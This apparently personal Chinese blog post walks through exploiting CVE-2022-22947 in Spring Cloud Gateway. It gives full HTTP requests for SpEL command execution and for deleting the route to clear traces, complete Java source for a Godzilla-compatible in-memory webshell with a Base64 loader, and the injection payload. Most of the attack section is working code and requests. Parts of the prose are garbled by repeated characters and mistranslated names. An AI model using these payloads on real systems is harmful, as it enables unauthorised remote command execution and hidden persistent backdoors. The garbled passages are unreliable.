Spring Cloud Gateway 内存马注入

漏洞简介

Spring Cloud Gateway 是基于Spring Framework 和 Spring Boot 构建的API 网关,它早在为微服务架构提供一种简单、有效、通用的API 由管理方式
以下版本的Spring Cloud Gateway 存在SPEL表格2表格2表格2表格-22947,可导致未授权远程命令执行漏洞

  • 漏洞信息:CVE-2022-22947
  • 使用版本:
    • 春季云网关 3.1.x < 3.1.1
    • 春季云网关 3.0.x < 3.0.7
    • Spring Cloud Gateway 其他已经不再更新的版本

漏洞复现

  • 发送恶意请求,创建路径由及编写SpEL表达式
    • id段落指定新路由名称,必须唯一一
    • filters字段给这条路由指定若干过滤器,过滤器用于对请求和响应进行修改
      • name字段指定要添加的过滤器,这里添加了一个AddResponseHeader过滤器,用于gateway给客户返回响应之前添加一个响应头
      • args.name字段指定要添加的响应头
      • args.valuespel表达式的的这里。。。这里的值值值执行执行,whoami whoami命令命令命令命令。。注意需要将将将不能以 r 或 n 结尾”
      • uri字段指定将客户端请求转发到http://example.com
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
CVE-2022-22947-1
  • 刷新路由,此时将触发并控制行SpEL表达式。
    • 需要注意的是,请申请体中需要空一行,否则发送后会一直等待,下同
POST /actuator/gateway/refresh HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

CVE-2022-22947-2
  • 查看执行结果
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

CVE-2022-22947-3
  • 最后可以删除所添加的路由,进行痕迹清理
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
CVE-2022-22947-4
  • 最后刷新下路由
POST /actuator/gateway/refresh HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

CVE-2022-22947-5

漏洞修复

CVE-2022-22947-6

哥斯拉内存马

环境

  • 创建Maven项目,引入依赖
<dependencies>
  <dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-starter-gateway</artifactId>
    <version>3.0.6</version>
  </dependency>
</dependencies>

构造

这里使用GMemShell.java哥斯拉内存马

  • 构造内存马,设置变量passkey,其他doInject方法传入的path参数为木马路径
    • 这里key是明文testpwdMD5值前16位echo -n "testpwd" | md5 | cut -c 1-16
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.reactive.result.method.RequestMappingInfo;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;

import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

public class GMemShell {
  public static Map<String, Object> store = new HashMap<>();
  public static String pass = "test", md5, key = "342df5b036b2f281";
  
  public static String doInject(Object obj, String path) {
    String msg;
    try {
      md5 = md5(pass + key);
      Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);
      registerHandlerMethod.setAccessible(true);
      Method executeCommand = GMemShell.class.getDeclaredMethod("cmd", ServerWebExchange.class);
      RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build();
      registerHandlerMethod.invoke(obj, new GMemShell(), executeCommand, requestMappingInfo);
      msg = "ok";
    } catch (Exception e) {
      e.printStackTrace();
      msg = "error";
    }
    return msg;
  }
  
  
  private static Class defineClass(byte[] classbytes) throws Exception {
    URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
    Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
    method.setAccessible(true);
    return (Class) method.invoke(urlClassLoader, classbytes, 0, classbytes.length);
  }
  
  public byte[] x(byte[] s, boolean m) {
    try {
      javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
      c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(key.getBytes(), "AES"));
      return c.doFinal(s);
    } catch (Exception e) {
      return null;
    }
  }
  
  public static String md5(String s) {
    String ret = null;
    try {
      java.security.MessageDigest m;
      m = java.security.MessageDigest.getInstance("MD5");
      m.update(s.getBytes(), 0, s.length());
      ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
    } catch (Exception e) {
    }
    return ret;
  }
  
  public static String base64Encode(byte[] bs) throws Exception {
    Class base64;
    String value = null;
    try {
      base64 = Class.forName("java.util.Base64");
      Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
      value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});
    } catch (Exception e) {
      try {
        base64 = Class.forName("sun.misc.BASE64Encoder");
        Object Encoder = base64.newInstance();
        value = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});
      } catch (Exception e2) {
      }
    }
    return value;
  }
  
  public static byte[] base64Decode(String bs) throws Exception {
    Class base64;
    byte[] value = null;
    try {
      base64 = Class.forName("java.util.Base64");
      Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
      value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
    } catch (Exception e) {
      try {
        base64 = Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
      } catch (Exception e2) {
      }
    }
    return value;
  }
  
  @PostMapping("/cmd")
  public synchronized ResponseEntity cmd(
    ServerWebExchange pdata) {
    try {
      Object bufferStream = pdata.getFormData().flatMap(c -> {
        StringBuilder result = new StringBuilder();
        try {
          String id = c.getFirst(pass);
          byte[] data = x(base64Decode(id), false);
          if (store.get("payload") == null) {
            store.put("payload", defineClass(data));
          } else {
            store.put("parameters", data);
            java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();
            Object f = ((Class) store.get("payload")).newInstance();
            f.equals(arrOut);
            f.equals(data);
            result.append(md5.substring(0, 16));
            f.toString();
            result.append(base64Encode(x(arrOut.toByteArray(), true)));
            result.append(md5.substring(16));
          }
        } catch (Exception ex) {
          result.append(ex.getMessage());
        }
        return Mono.just(result.toString());
      });
      return new ResponseEntity(bufferStream, HttpStatus.OK);
    } catch (Exception ex) {
      return new ResponseEntity(ex.getMessage(), HttpStatus.OK);
    }
  }
}
  • 最后使用Maven进行编译,得到GMemShell.class
$ mvn compile
CVE-2022-22947-7
  • 编写加载器,加载该类文件并转换为Base64编码
import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.util.Base64;

public class LoaderClass {
  public static byte[] load(String path) {
    FileInputStream fis = null;
    ByteArrayOutputStream baos = null;
    
    try {
      fis = new FileInputStream(path);
      baos = new ByteArrayOutputStream();
      byte[] buffer = new byte[1024];
      int len = -1;
      while ((len = fis.read(buffer)) != -1) {
        baos.write(buffer, 0, len);
        baos.flush();
      }
      return baos.toByteArray();
    }
    catch (Exception e) {
      e.printStackTrace();
    }
    finally {
      if (fis != null) {
        try { fis.close(); }
        catch (Exception e) { e.printStackTrace(); }
      }
      if (baos != null) {
        try { baos.close(); }
        catch (Exception e) { e.printStackTrace(); }
      }
    }
    return null;
  }
  
  public static void main(String[] args) {
    byte[] code = LoaderClass.load("target/classes/GMemShell.class");
    String temp = Base64.getEncoder().encodeToString(code);
    System.out.println(temp);
  }
}
CVE-2022-22947-8

注入

此处的使用了c0ny1师傅对默认Payload进行优化后的高可用Payload

这里需要向这个 SpEL 表示形式传入前面编写代码后的 Base64 字符串以及访问路径由,如/gmem

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '</路由>')}
  • 创路由
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 10770

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '/gmem')}"
    }
  }],
  "uri": "http://example.com"
}
CVE-2022-22947-9
  • 刷新路由
POST /actuator/gateway/refresh HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

CVE-2022-22947-10
  • 使用浏览器访问发现路径由已经打进去了
CVE-2022-22947-11
  • 使用哥斯拉进入连接
    • URL为Payload中注入的path
    • 密码为前面设置的pass,密码为key明文
CVE-2022-22947-12

注入2

魔改添加自定义

pass

key功能,这样只需要编译一次Class并生成对应的Base64编译码,每次使用时只需要输入不同的参数即驳斥可,而不用

因为在前面GMemShell.java这个文件中,pass/key是全局静态变量,所以不能像path这样直接向doInject方法传递参,所以一开始的想法是从SpEL 表达式输入

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '/路由')}

org.springframework.cglib.core.ReflectUtils这个类可以看到,上面的表达式中向这个类中的defineClass方法传入了3个参数:className类名、字符串数组byte[]loader类加载器,找不到可以利用的点

CVE-2022-22947-13

pass(然后keydoInjectpassKeykeyStrkeyStr_调用Spring中的DigestUtils类,所以还需要引入该类。

import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.util.DigestUtils;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.reactive.result.method.RequestMappingInfo;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;

import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

public class GMemShell {
  public static Map<String, Object> store = new HashMap<>();
  
  public static String pass, md5, key;
  
  public static String doInject(Object obj, String path, String passStr, String keyStr) {
    String msg;
    
    pass = passStr;
    key = DigestUtils.md5DigestAsHex(keyStr.getBytes()).substring(0, 16);
    
    try {
      md5 = md5(pass + key);
      Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);
      registerHandlerMethod.setAccessible(true);
      Method executeCommand = GMemShell.class.getDeclaredMethod("cmd", ServerWebExchange.class);
      RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build();
      registerHandlerMethod.invoke(obj, new GMemShell(), executeCommand, requestMappingInfo);
      msg = "ok";
    } catch (Exception e) {
      e.printStackTrace();
      msg = "error";
    }
    return msg;
  }
  // ...
}
  • 同样地,SpEl表达式也需要稻微修改下,添加接收密码和密匙参数
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '</路由>','<密码>','<密钥>')}
CVE-2022-22947-14
CVE-2022-22947-15

声明:本站为非盈利个人记录网站多数图片来自于正版授权,少部分转载自网络,原创内容版权归本站所有,转载内容归原作者所有。如有内容、图片、信息侵犯到您的合法权益,请联系我(7@7zz.cn)做删除处理。

给TA打赏
共{{data.count}}人
人已打赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索